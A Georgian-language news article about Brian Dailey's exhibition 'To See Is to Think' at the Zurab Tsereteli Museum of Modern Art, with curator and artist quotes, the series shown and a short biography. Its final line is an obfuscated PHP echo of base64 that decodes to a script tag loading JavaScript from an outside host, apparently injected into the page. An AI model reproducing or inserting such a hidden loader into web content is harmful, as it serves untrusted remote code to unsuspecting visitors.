celsiusi
ავერსი საქკაბელი

30 ივნისს, ზურაბ წერეთლის თანამედროვე ხელოვნების მუზეუმში გამოფენა – „დაინახო ნიშნავს, რომ ფიქრობ“ გაიხსნა, რომელიც 25 აგვისტოს ჩათვლით გაგრძელდება.

კურატორის სტეფან სტოიანოვის თქმით, ბოლო ოცი წელია ბრაიან დეილის ნამუშევრები ჩვენი დროის აქტუალურ სოციალურ, პოლიტიკურ და კულტურულ საკითხებს განიხილავს.

„კოსმოსური გამოსახულებებიდან დაწყებული, გლობალურ დონეზე მიმდინარე სამუშაოებით, კონცეპტუალური ნამუშევრებით, ვიზუალური გამოცანებით, სამხედრო და ინდუსტრიული სურათებით, სოციალური ვიდეო კოლაჟებით დასრულებული. მისი ხელოვნება მნახველს ჯერ თავისი სილამაზით აცდუნებს, შემდეგ კი მას ჩვენი დროის სერიოზულ პრობლემებთან დაპირისპირებას სთავაზობს.“ – განაცხადა მან.

თავად ხელოვანის თქმით, მისი ხელოვნება ისტორიებს მოგვითხრობს.

„მე ადამიანების ისტორიების მემატიანე ვარ, რომელიც იმას ჰყვება, რასაც ადამიანები თავისი თავის, მსოფლიოსა და ცხოვრების შესახებ მამცნობენ. მე ვაკვირდები, ვუსმენ და შემდეგ ვქმნი."

როგორც ცნობილი გახდა, ბრაიან დეილის ნამუშევრების ეს გამოფენა 2010 წლიდან დღემდე შექმნილ რამდენიმე სერიას აერთიანებს. დეილი თავის გამორჩეულ და საკმაოდ უჩვეულო ცხოვრებას კონცეპტუალური ნამუშევრების, მათ შორის პორტრეტების, პერფორმანსების, ვიდეოსა და სიტყვების შესაქმნელად იყენებს, ყოვლისმომცველი თემის ფონზე ენისა და მისი ნიუანსების კომუნიკაციისადმი კრიტიკული დამოკიდებულების ჩამოყალიბებას განიხილავს. გამოფენა ხელოვანის მიერ გაწეულ იმ პირად კვლევას ეფუძნება, რომელიც მისი მთავარი ნამუშევრით „ფერებში გამოხატული ამერიკა“ იწყება და ავტობიოგრაფიული სერიით „14 სადგური გზაჯვარედინზე" სრულდება.

აღსანიშნავია, რომ ამერიკის შეერთებულ შტატებში არსებული მკვეთრად პოლარიზებული პოლიტიკური გარემოს კაკაფონიის ფონზე ხელოვანი ამერიკელი ამომრჩევლის ფოტოპორტრეტების შექმნის მრავალმხრივ ორწლიან პროექტში ჩაერთო და ის დემოკრატიის, მრავალფეროვნების, იდენტობისა და სტერეოტიპების საკითხების განხილვას მიუძღვნა.

„14 სადგური გზაჯვარედინზე“ ბრაიან დეილის მოგზაურობაზე მოგვითხრობს და იმ გადაწყვეტილებებს ასახავს, რომლებმაც მისი იდენტობისა და ხასიათის განსაზღვრაზე მოახდინეს გავლენა.

გამოფენის მთავარი ყურადღება სერიას „სიტყვები“ ეთმობა, რომელიც ხელოვანის მიერ ენაზე, საზოგადოებაზე, კულტურისა და გარემოს ძირითად ადამიანურ სტრუქტურებზე გლობალიზაციის გავლენის შვიდწლიანი კვლევის შედეგია.

„სიტყვების მულტიმედია“ დროზე დაფუძნებული ნამუშევარია, რომელიც დამთვალიერებელს აქტუალურ საკითხებზე მოუთხრობს და ამავე დროს მსოფლიო მოქალაქეებში საზოგადოებრივ საკითხებთან დაკავშირებულ ემოციებს აღძრავს. ნამუშევარში „სიტყვები სიტყვებზე“ ცალკეული ერთ სიტყვიანი პასუხები ფერების განუზომელ სპექტრში სხვადასხვა შრეებს ქმნიან და მათ ორმხრივად ამოზნექილი სამგანზომილებიანი ეფექტის საშუალებით აძლიერებენ. მასში მონაწილეების ხმების პარალელურად საკუთარი ხმის ჩართვით დეილი დადასა და სიურეალისტური სიტყვების თამაშის მსგავს ტრადიციული რწმენის საწინააღმდეგო განცხადებებს წარმოშობს. დეილის პროექტი, რომელმაც ის 120 ქვეყანაში და შვიდივე კონტინენტზე ამოგზაურა ცდილობს, კაცობრიობა შემდეგ სოციალურ კონცეფციებში: მშვიდობა, ომი, სიყვარული, გარემო, თავისუფლება, რელიგია, დემოკრატია, მთავრობა, ბედნიერება, სოციალიზმი, კაპიტალიზმი, მომავალი და შეერთებული შტატები აღმოაჩინოს.

გამოფენა სრულდება პოპულარული ვიდეო ნამუშევრით „ჯიკაი“, რომელიც 2013 წელს, ერთი თვის განმავლობაში იყო ნაჩვენები ნიუ-იორკის ტაიმს სკვერის ყველა ეკრანზე.

 

მოკლე ბიოგრაფია: ალბათ არცერთი სიტყვა ისე კარგად არ ახასიათებს ბრაიან დეილის (დაიბადა 1951 წელს), როგორც „პოლიტროპოსი“ - პირველი ზედსართავი სახელი, რომლითაც ჰომეროსი „ოდისეაში“ ოდისევსს მოიხსენიებს. ბერძნულიდან ეს სიტყვა „ბევრის მნახველად“, „ბევრ მოგზაურობა გამოვლილად“, უფრო მეტად მეტაფორული გაგებით კი „მრავალმხრივად რთულად“ ითარგმნება. პოლიტროპოსი კარგად შეეფერება დეილის ცხოვრებისეული მოგზაურობისა და მის მიერ სხვადასხვა საკითხის სისტემატური შესწავლის აღწერას. ოტისის ხელოვნების ინსტიტუტში სწავლისა (ხელოვნების მაგისტრატურა, 1975) და შემდეგ ლოს ანჯელესში დაწყებული სამხატვრო კარიერის პერიოდში დეილი იმ პიონერულ შემოქმედებით ექსპერიმენტებში მონაწილეობდა, რომლებმაც კალიფორნიაში იმ დროის ნაყოფიერი მხატვრული გარემოს წარმოშობა განსაზღვრეს. ხელოვანის საქმიანობასთან დაბრუნებამდე ის კარიერის ადრეულ ეტაპზე ოცი წლის განმავლობაში იარაღის კონტროლისა და საერთაშორისო უსაფრთხოების საკითხებზე მუშაობდა. ეს უჩვეულო გამოცდილება, რომელიც მან იმავე ცნობისმოყვარეობით მიიღო, რომლითაც ამჟამინდელ სამუშაოს ახორციელებს, მისი იდიოსინკრეტული და ინდივიდუალისტური შემოქმედებითი პრაქტიკის შთაგონების ნაყოფიერ წყაროდ იქცა. ვაშინგტონის მეტროპოლიტენის რაიონსა და კარმელში (კალიფორნია) მცხოვრები დეილი ის ხელოვანია, რომლის სხვადასხვა მედიუმით შექმნილი ნამუშევრები (ფოტო, ფილმი, ინსტალაცია, ფერწერა) მის მრავალმხრივ ცხოვრებისეულ გამოცდილებას ასახავენ.

 

565
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");